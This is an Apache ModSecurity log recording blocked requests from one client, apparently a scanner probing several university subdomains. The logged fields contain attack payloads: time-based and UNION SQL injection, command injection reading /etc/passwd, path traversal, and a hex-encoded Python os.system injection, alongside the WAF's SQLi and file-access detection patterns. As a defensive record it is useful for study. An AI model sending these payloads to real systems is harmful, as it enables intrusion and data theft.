[Tue Aug 29 11:35:27.326712 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATzVLQAAAAx"]
[Tue Aug 29 11:35:27.330003 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUJI1AAAABB"]
[Tue Aug 29 11:35:27.343323 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUNao4AAABF"]
[Tue Aug 29 11:35:27.340702 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASEJaoAAAAE"]
[Tue Aug 29 11:35:27.347360 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATavxcAAAAg"]
[Tue Aug 29 11:35:27.349343 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASHiAAAAAAD"]
[Tue Aug 29 11:35:27.349843 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUR88QAAABI"]
[Tue Aug 29 11:35:27.331442 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11j8Co-f0AAATOBAcAAAAH"]
[Tue Aug 29 11:35:27.387833 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVJXm4AAAAA"]
[Tue Aug 29 11:35:28.306606 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAUR88UAAABI"]
[Tue Aug 29 11:35:28.312476 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAUbg3EAAABQ"]
[Tue Aug 29 11:35:28.326882 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11kMCo-f0AAAVRxfMAAAAQ"]
[Tue Aug 29 11:35:28.332748 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11kMCo-f0AAAN5YIsAAAAN"]
[Tue Aug 29 11:35:28.337907 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11kMCo-f0AAAVoCBoAAAAY"]
[Tue Aug 29 11:35:28.347948 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAASI0G4AAAAG"]
[Tue Aug 29 11:35:28.348293 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAASPDQ8AAAAS"]
[Tue Aug 29 11:35:29.299606 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAASEJawAAAAE"]
[Tue Aug 29 11:35:29.301026 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUR88YAAABI"]
[Tue Aug 29 11:35:29.305587 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUUZ@0AAABK"]
[Tue Aug 29 11:35:29.309847 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAN5YIwAAAAN"]
[Tue Aug 29 11:35:29.320049 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUKhCoAAABC"]
[Tue Aug 29 11:35:29.337189 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVPX5UAAAAF"]
[Tue Aug 29 11:35:29.345553 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVsUc0AAAAb"]
[Tue Aug 29 11:35:29.350440 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kcCo-f0AAASI0HAAAAAG"]
[Tue Aug 29 11:35:30.311673 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAT2JTwAAAAz"]
[Tue Aug 29 11:35:30.345907 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAVr@SsAAAAZ"]
[Tue Aug 29 11:35:30.349638 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUUZ@8AAABK"]
[Tue Aug 29 11:35:30.359631 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAATWYVEAAAAa"]
[Tue Aug 29 11:35:30.383252 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAVRxfcAAAAQ"]
[Tue Aug 29 11:35:30.420702 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ksCo-f0AAASEJa4AAAAE"]
[Tue Aug 29 11:35:31.392133 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11k8Co-f0AAAUJI1cAAABB"]
